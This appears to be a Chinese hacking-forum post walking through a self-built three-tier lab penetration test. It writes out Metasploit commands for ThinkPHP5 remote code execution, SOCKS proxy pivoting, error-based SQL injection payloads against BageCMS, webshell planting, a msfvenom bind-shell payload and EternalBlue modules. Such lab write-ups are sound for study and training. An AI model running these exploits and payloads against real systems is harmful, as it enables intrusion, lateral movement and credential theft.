跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

渗透测试之CFS三层靶机内网渗透

CNHAT
CNHAT
WEB和服务器安全漏洞

精选回复

发布于 
 
 

一、环境搭建:

靶机拓扑:

?i=75ff82a032db412db58b0bdec2958731.png?

 

1.添加虚拟网卡:

添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡

VMnet8为NAT模式与外部通信

?i=1ad1286cf87941f4bba28947eea0fe46.png?

2.配置网卡:

target1网络配置:

?i=ded05b50bac34e3c968b68b2449c176b.png?

target2网络配置:

?i=d7df41dc91bd4827960381863e61d53d.png?

target3网络配置:

?i=b04a670ac61e4bf783c434c6297791d7.png?

 3.web靶机搭建(宝塔面板启动)

启动命令: /etc/init.d/bt start

重启 /etc/init.d/bt restart

默认端口管理8888

 

 

环境搭建完 kali能ping通target1  target1能ping通target2   target2能ping通target3  三层网络关系

二、渗透测试:

信息收集:

target1(thinkphp5搭建)

?i=50cf04d7cc8c4c4c9b052e8629698f5f.png?

 使用nmap扫描端口 

nmap -sV -p 1-65535 -T4 192.168.234.178

?i=6049b5130c2f4373b1d0fc3dd547b60f.png?

因为是thinkphp5  想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭) 

search thinkphp                (查找可利用exp)
use 0                          (选择exp)
set rhosts 192.168.234.178     (目标target1ip)
set rport 80                   (目标target1的端口)
set lhost 192.168.234.130      (shell接收ip 这里是kali本机ip)
set lport 4444                 (shell接收端口)
run                            (执行exp)

?i=4d5f761b42f54e219747ec7e2112984e.png?

执行返回一个shell  target1拿下

?i=dabd52c7675342e7979464d565482ab0.png?

信息收集 

getuid     
sysinfo
ifconfig

查看ip发现两个ip (22网段是内网网段)

?i=8529a9827c8846b69c98813309559216.png?

使用msf添加路由

run autoroute -s 192.168.22.0         添加22网段路由

run autoroute -p                               查看路由

?i=c9c17acd4bd74c9aac9676b866433051.png?

已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;

使用sock4+proxychains4代理打通内网 

use auxiliary/server/socks_proxy 
options
set srvhost 192.168.234.130
set version 4a

?i=d6fb8148c8dd46c990414c0fe82a0bfc.png? 

还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加) 

 ?i=a3a3928996c44d678f23111b5cc8fb1a.png?

代理下使用namp扫描 

proxychains4 nmap -Pn -sT 192.168.22.0/24

proxychains4 nmap -Pn -sT 192.168.22.129

?i=882543183ffe4791816583a3db7ceda3.png? 内网还有web 配置kali浏览器sock代理

?i=40ac8001da70499cb9d7964c7ae40e76.png?

 ?i=6249715fc050405494a0dd36fc542737.png?

 使用八哥CMS搭建

 使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)

proxychains4  gobuster dir -u http://192.168.22.129/    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php 

?i=c2813afad2e14c148894b1fdf455a41a.png?访问 robots.txt 发现目录  ?i=8a462094239b4210910e40fa998891ab.png?

 在index.php中发现sql注入提示?i=ec9ce314101144d5aa3929ed2f1917c8.png?

 手工报错注入

 爆数据库名: 

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

爆表名: 

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

?i=2b220dac95524e868d3b3e1b0b25cc2d.png?

最后爆出数据: admin 123qwe

?i=86e222e8541e4fe69655a2436273d84a.png? 

 md5解密后得到后台账号密码 admin 123qwe

登录后台 http://url/index.php?r=admini/default/index

?i=f21beea2c14d4a60bcd1289649cd04bf.png?

 内容模板写入shell?i=979e9fb5977e41ae8659ee262b830594.png?

?i=461efadc09c2466b961a8fa8d87f7201.png?

使用AntSword设置代理连接shell

?i=e9a9d601df514d7fa052ab31fafd63d2.png? 

?i=3487f78fac344a1e971c4a8d30282096.png? 信息收集 发现33网段

?i=f149bced0103461681f2d9e718858ec8.png?

 因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向马 

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf

 将马子赋执行权限上传到webshell中 同时使用代理开启一个msf 

proxychains4 msfconsole

使用代理的msf开启监听 

use exploit/multi/handler                      使用监听模块
set payload linux/x86/meterpreter/bind_tcp     设置payload
set lport   4444                               设置接收端口与msfvenoms生成端口一致
set rhost   192.168.22.129                     设置目标主机(target2)

?i=5b79802da5fd49aaa06e197a4bc72ebd.png?

 拿到 target2 shell?i=1d2606f53a324c3e9a7dbacd6337b8de.png?

 添加33网段路由

 run autoroute -s 192.168.33.0/24

run autoroute -p

?i=c427aa90fdc64afdb6dd4c62cd4609d5.png? 

 使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

 ?i=001ba97386e74210ac9fa2c4cea9cb85.png?

 发现 192.168.33.33 主机并开放 445、3389  敏感端口

?i=30e4f42ea03c4832be7cf9c35f67e27a.png?

 msf尝试永恒之蓝 

use auxiliary/scanner/smb/smb_ms17_010     检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe     利用ms17010

使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)

?i=2825c1c4b5fa4f00ab70d16739620ecd.png?

use auxiliary/admin/smb/ms17_010_command     这个exp可以执行命令

?i=ea1dfd4fb9d049e794e7aaad62d4bd4d.png?

 至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权; 

 

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。